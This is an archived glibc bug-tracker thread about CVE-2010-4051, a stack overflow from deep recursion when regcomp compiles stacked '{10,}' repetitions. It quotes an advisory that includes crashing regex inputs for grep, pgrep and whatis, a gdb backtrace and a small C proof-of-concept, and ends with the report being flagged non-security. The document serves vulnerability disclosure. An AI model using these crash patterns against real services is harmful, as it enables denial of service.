[Bug regex/18013] New: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)

classic Classic list List threaded Threaded
4 messages Options
Reply | Threaded
Open this post in threaded view
|

[Bug regex/18013] New: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)

maiku.fabian at gmail dot com
https://sourceware.org/bugzilla/show_bug.cgi?id=18013

            Bug ID: 18013
           Summary: Stack overflow due to deep recursion in regcomp
                    (CVE-2010-4051)
           Product: glibc
           Version: unspecified
            Status: NEW
          Severity: normal
          Priority: P2
         Component: regex
          Assignee: unassigned at sourceware dot org
          Reporter: fweimer at redhat dot com
                CC: drepper.fsp at gmail dot com

This is the first report from <http://seclists.org/fulldisclosure/2011/Jan/78>,
included below:

- --- 1. RE_DUP_MAX overflow ---
The main problem exists in regcomp(3) function of GNU libc
implementation. Let`s try understand..

- ---
int
regcomp (preg, pattern, cflags)
    regex_t *__restrict preg;
    const char *__restrict pattern;
    int cflags;
{
- ---

if we use '{', token type will be OP_OPEN_DUP_NUM.

- ---
/* This function parse repetition operators like "*", "+", "{1,3}" etc.  */

static bin_tree_t *
parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,
              re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)
{
  bin_tree_t *tree = NULL, *old_tree = NULL;
  int i, start, end, start_idx = re_string_cur_idx (regexp);
  re_token_t start_token = *token;

  if (token->type == OP_OPEN_DUP_NUM)
    {
      end = 0;
      start = fetch_number (regexp, token, syntax); <===== CONVERT VALUE
- ---

let`s see fetch_number =>

- ---
static int
fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)
{
  int num = -1;
  unsigned char c;
  while (1)
    {
      fetch_token (token, input, syntax);
      c = token->opr.c;
      if (BE (token->type == END_OF_RE, 0))
        return -2;
      if (token->type == OP_CLOSE_DUP_NUM || c == ',')
        break;
      num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)
             ? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));
      num = (num > RE_DUP_MAX) ? -2 : num;
    }
  return num;
}
- ---

now see regex.h to know, what value have RE_DUP_MAX

- ---
/* Maximum number of duplicates an interval can allow.  Some systems
   (erroneously) define this in other header files, but we want our
   value, so remove any previous define.  */
# ifdef RE_DUP_MAX
#  undef RE_DUP_MAX
# endif
/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows.  */
# define RE_DUP_MAX (0x7fff)
#endif
- ---

calc_eclosure_iter() will call to calc_eclosure_iter() match time. and
crash in malloc(3). Simple Recursion.

so we can't use value bigger 0x7fff in {n,}. regcomp(3) should return
ERROR if we use more that one time '{' token.

They are many vectors attack

grep(1):
cx () cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

pgrep(1):
cx () cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

bregex from bacula-director-common
cx () cx64:~$ bregex -f glob-0day.c
Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,}
Segmentation fault

whatis(1):
cx () cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

and more like proftpd.

Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x7ffff7ad3ea2:      mov    %eax,0x50(%rsp)
(gdb) x/i $eax
   0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
   0x7fffff5fef90:      Cannot access memory at address 0x7fffff5fef90
(gdb) x/i 0x50($rsp)
Cannot access memory at address 0x7fffff5fef08


#0  0x00007ffff7ad3ea2 in ?? () from /lib/libc.so.6
#1  0x00007ffff7ad538e in malloc () from /lib/libc.so.6
#2  0x00007ffff7b17d9b in ?? () from /lib/libc.so.6
#3  0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#4  0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#5  0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#6  0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#7  0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
...

- ---PoC1---
#include <regex.h>

int main(){
  regex_t preg;

//  char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
  char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; CVE-2010-4051

  regcomp (&preg, fmt, REG_EXTENDED);

  return 0;
}
- ---PoC1---

--
You are receiving this mail because:
You are on the CC list for the bug.
Reply | Threaded
Open this post in threaded view
|

[Bug regex/18013] Stack overflow due to deep recursion in regcomp (CVE-2010-4051)

maiku.fabian at gmail dot com
https://sourceware.org/bugzilla/show_bug.cgi?id=18013

Florian Weimer <fweimer at redhat dot com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
           See Also|                            |https://sourceware.org/bugz
                   |                            |illa/show_bug.cgi?id=17070

--
You are receiving this mail because:
You are on the CC list for the bug.
Reply | Threaded
Open this post in threaded view
|

[Bug regex/18013] Stack overflow due to deep recursion in regcomp (CVE-2010-4051)

maiku.fabian at gmail dot com
In reply to this post by maiku.fabian at gmail dot com
https://sourceware.org/bugzilla/show_bug.cgi?id=18013

Florian Weimer <fweimer at redhat dot com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Flags|                            |security-

--- Comment #1 from Florian Weimer <fweimer at redhat dot com> ---
Per our Security Exceptions, this is not a security bug:

https://sourceware.org/glibc/wiki/Security%20Exceptions

--
You are receiving this mail because:
You are on the CC list for the bug.
Reply | Threaded
Open this post in threaded view
|

[Bug regex/18013] Stack overflow due to deep recursion in regcomp (CVE-2010-4051)

maiku.fabian at gmail dot com
In reply to this post by maiku.fabian at gmail dot com
https://sourceware.org/bugzilla/show_bug.cgi?id=18013

--- Comment #2 from Florian Weimer <fweimer at redhat dot com> ---
*** Bug 18014 has been marked as a duplicate of this bug. ***

--
You are receiving this mail because:
You are on the CC list for the bug.